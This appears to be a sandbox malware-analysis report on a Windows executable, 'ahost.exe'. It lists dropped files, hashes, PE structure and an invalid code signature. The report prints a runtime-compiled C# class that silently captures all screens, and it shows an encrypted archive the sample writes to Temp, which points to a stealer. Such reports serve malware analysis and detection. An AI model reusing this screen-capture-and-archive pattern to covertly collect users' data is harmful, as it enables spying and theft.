SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iomguptq.cky.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqsefscm.gg2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kj3vmpjq.xyf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_muxo0h0t.hzf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qlw42cqt.e4n.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbcmnxh2.qed.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqju3fqj.5i4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ypxq4g0z.l0k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0894605198873295
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry2Sak7YnqqjzPN5Dlq5J:+RI+ycuZhNRakSvPNnqX
MD5:	16322AF854F5862907026DEED0D160CC
SHA1:	BB743BBA2BE4D56B9EB42072DAF1ECB33BB948A0
SHA-256:	7C99C32B237FCA901D5C8AF8DDB1A4A81407D005BCE61BA1120FE4F88E73F915
SHA-512:	97CDA39197AFCE971DD862B8E70FC3514F5D8FD20B921FE17B527B8A1C66A86B876AB05BB55ED5E82ACADFF97253DB0192CBAE1D317357D0B492DC02E2BB4BB8
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.h.b.t.5.s.l.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...o.h.b.t.5.s.l.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Reputation:	unknown
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (602), with no line terminators
Category:	dropped
Size (bytes):	605
Entropy (8bit):	5.306783752733921
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikywZ6WZEmwZf:V3ka6KOkqeFkywZbEmwZf
MD5:	B5FF184BE9F86E06F837A9C356981AB5
SHA1:	574F99EEA62D49D31052DB363D49FD2E07E9A2E6
SHA-256:	4F96867754C7D4581ACF9024E19580A8B6052934043D70C409ACD616F9E3FCFF
SHA-512:	67BBDBF0D1AF3321D37F9BCAAE177370077DD5F3BBEA89F168E8566B5798866ECE3AF179EFD26F0AE9951B74DEE7290A56FF5781834F028524D86EF40988DDFC
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.0.cs"

C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1540757159926742
Encrypted:	false
SSDEEP:	48:6+7oEAtf0KhzBU/Zf6mtJKN0upW1ulRa3tq:+Nz0omiOEzK
MD5:	C9C2776956BBB180A4EEEE5755C95FD1
SHA1:	6E42F794DF407B482D21AA3B5724C2B0EB4CE9F4
SHA-256:	8F09F7C905457744575BF5163EE329FB7E62E24E8451BA743E96B056C94AA68E
SHA-512:	645F1EE94EEC8C93762544C90BA2D512E38CE1A3F6F31B8EFAA0D14E1F2BC11EAC729923A295FE33E4FBDCF285E15E309BDA59BC282ACCD807595FE2B6570126
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.[g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (705), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1146
Entropy (8bit):	5.470998445458484
Encrypted:	false
SSDEEP:	24:KTwZDEkId3ka6KOkqeFkywZbEmwZGKax5DqBVKVrdFAMBJTH:mwZLkka6NkqeFkywZbEmwZGK2DcVKdBt
MD5:	330B7996387628A4E4D4D24AD994116E
SHA1:	D5ABAC3ACDE32EBFB8176C47A035C6B26CC23D34
SHA-256:	8DBBE015804B28D245367EBF44BFD6DF4EEEED54707B21A9E0977EF24878ED55
SHA-512:	2E9B7ACA9CBB85D97C804A886C49F15EEA3C4FD79B5DB5EFB24EB7BC10BDF95EA0A43F26421770A688098908819A205EA0FD2507340B9635636D1EC1BCBEC6AE
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer t

C:\Users\user\AppData\Local\Temp\p92x0.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	692414
Entropy (8bit):	7.999708142842713
Encrypted:	true
SSDEEP:	12288:ANUd7XaDmz9N3M44xx46at610AWJxkv9Q0p2nyZD10qpl2:qUMDocxBywYJ+204nypJp4
MD5:	7A7E2688BBE7BB0E723FFBF94271599C
SHA1:	ED9906413AC2C21C28135FC6065DF4720E5A016C
SHA-256:	F818D4856F87DBD5F93CF0C6575C05B9FE1D50AE3CD75CA3B4EA4AE53E420238
SHA-512:	3B4ACFC3BDA1ABDED7B37296D20338B8AB2F6B757215A2E12CE2FBD7ADD03254869FA83A12A5E369AE9FB701264EE4F38D3D4ECC7CE9EA55AFBEB5C3196F3976
Malicious:	true
Reputation:	unknown
Preview:	Rar!.....?.!........G..U...}.^....)...;{..E.0v...ev.<.X..~.M....qIS...}....b....?.r).N.wnCeA..r_g<W..DWkdN...3.!......3..#E.oh...N....AXq..r1...i.Od.T&0>/.2.0./.a..+...7..BO.W..n.s......P.W..J..m......Uy...u6_.U..........<.%%.p..MC...5....W.G....?.g.;..Y0eJ.B.<..:..`w.......Y.]>..=.{...[...'>x...A...N%.+..ux.}a.W1m..O.`:I^.}...q.k7.. .&9..u.M.L.$...^L.}!.1(..q.O{......l.[....x.g.nZ...o%.....EL....... .`u...r.m.PQ..z.s..z.Ig...l...+@....DCo...iG.>......$,.eV.n.o.5.<.."..........wT=C.Z.H>a.3h..tQK...M.D.-).^p....y.....h....QXbJ......1.h.j7.;..s..K.?. .[..-.....mHHY...o...<.v..y..>.m^.....7.y-Gd..%..k.....M.........4..........n%..e...<..... ......m..8.7......`!c..j..&\..].-...V.&.U.M.S...e..n.<.}R..u...f.....e.B....}0.G.4"`D62....Z..SB@U;......F..<}b.e..m.i...T8.[...-3&.n.%p.[.QN.,j....A`...h.G.\|S1N..!.......I-k....#j..`...K..J.AY.j.=PF!Q....ee...b....)t$.q.....l.;.?.K..n...n....uX..l[C..3..i..,t6{x.?N....*\.'.~....h..a0.._...,;..%.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Reputation:	unknown
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.993241290598408
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ahost.exe
File size:	7'967'812 bytes
MD5:	b5fc1d627d4db7ee46dc0fe38ac28d01
SHA1:	35e2fa322989afa985734caa7c663510de21a2cc
SHA256:	0f145a4d00566964b14e9b825779fd1aae1ea308a36e9d3536534779e19d64a1
SHA512:	9f81b20c9d6e6652a4dde5d17722aa24e54c971e18bd80f3dd19b55427a3b8a9bc39444549ea98c39a571cd81049d37c54113a325f5c04daa1409ff0e8297610
SSDEEP:	196608:BHHYHRwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jN:SOIHziK1piXLGVE4Ue0VJJ
TLSH:	E9863301B68009F6F6BBDA3DC8928419C473376217A0DAEB071CD27A1E731F99876767
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

File Icon


Icon Hash:	212303032313271a

Static PE Info

General

Entrypoint:	0x14000ce20
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6754A135 [Sat Dec 7 19:25:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	28/09/2021 20:00:00 28/09/2024 19:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FEB8148D17Ch
dec eax
add esp, 28h
jmp 00007FEB8148CD9Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007FEB8148D548h
test eax, eax
je 00007FEB8148CF43h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FEB8148CF27h
dec eax
cmp ecx, eax
je 00007FEB8148CF36h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007FEB8148CF10h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FEB8148CF19h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007FEB8148CF29h
mov byte ptr [000356F5h], 00000001h
call 00007FEB8148C675h
call 00007FEB8148D960h
test al, al
jne 00007FEB8148CF26h
xor al, al
jmp 00007FEB8148CF36h
call 00007FEB8149A47Fh
test al, al
jne 00007FEB8148CF2Bh
xor ecx, ecx
call 00007FEB8148D970h
jmp 00007FEB8148CF0Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007FEB8148CF89h
cmp ecx, 01h
jnbe 00007FEB8148CF8Ch
call 00007FEB8148D4BEh
test eax, eax
je 00007FEB8148CF4Ah
test ebx, ebx
jne 00007FEB8148CF46h
dec eax
lea ecx, dword ptr [000356A6h]
call 00007FEB8149A272h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca34	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x32f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2238	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x796ffc	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f70	0x2a000	b8c3814c5fb0b18492ad4ec2ffe0830a	False	0.5518740699404762	data	6.489205819736506	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a28	0x12c00	362d3e01c8d134bb938536e8cc960395	False	0.5243229166666666	data	5.750783315647887	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2238	0x2400	9cd1eac931545f28ab09329f8bfce843	False	0.4697265625	data	5.2645170849678795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x32f8	0x3400	56905e2af40063af19ad5b868c056ab5	False	0.8309044471153846	data	7.455750873320191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4b000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x47250	0x1c1	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	1.024498886414254
RT_ICON	0x47414	0x20c	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	1.0209923664122138
RT_ICON	0x47620	0x273	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	1.0175438596491229
RT_ICON	0x47894	0x434	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	1.0102230483271375
RT_ICON	0x47cc8	0x53e	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	1.0081967213114753
RT_ICON	0x48208	0x9b9	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	1.004419445560466
RT_ICON	0x48bc4	0xdc3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.930456996877661
RT_GROUP_ICON	0x49988	0x68	data	0.7403846153846154
RT_VERSION	0x499f0	0x3f8	data	0.4438976377952756
RT_MANIFEST	0x49de8	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, 